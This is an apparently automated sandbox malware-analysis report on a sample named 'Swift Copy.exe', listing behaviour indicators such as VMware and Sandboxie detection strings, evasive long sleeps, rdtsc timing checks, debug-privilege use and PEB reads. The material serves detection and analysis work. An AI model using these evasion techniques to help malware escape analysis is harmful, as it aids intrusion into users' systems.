Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1816 Thread sleep time: -45877s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1748 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F6B90 rdtsc 8_2_018F6B90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Swift Copy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9125 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 4.6 %
Source: C:\Users\user\Desktop\Swift Copy.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Thread delayed: delay time: 45877 Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000B.00000000.380692577.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 0000000B.00000000.334568953.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 0000000B.00000000.300110801.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 0000000B.00000000.327235591.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F6B90 rdtsc 8_2_018F6B90
Enables debug privileges
Source: C:\Users\user\Desktop\Swift Copy.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA185 mov eax, dword ptr fs:[00000030h] 8_2_018FA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EC182 mov eax, dword ptr fs:[00000030h] 8_2_018EC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2990 mov eax, dword ptr fs:[00000030h] 8_2_018F2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h] 8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h] 8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h] 8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h] 8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F61A0 mov eax, dword ptr fs:[00000030h] 8_2_018F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F61A0 mov eax, dword ptr fs:[00000030h] 8_2_018F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019469A6 mov eax, dword ptr fs:[00000030h] 8_2_019469A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h] 8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h] 8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h] 8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h] 8_2_019849A4
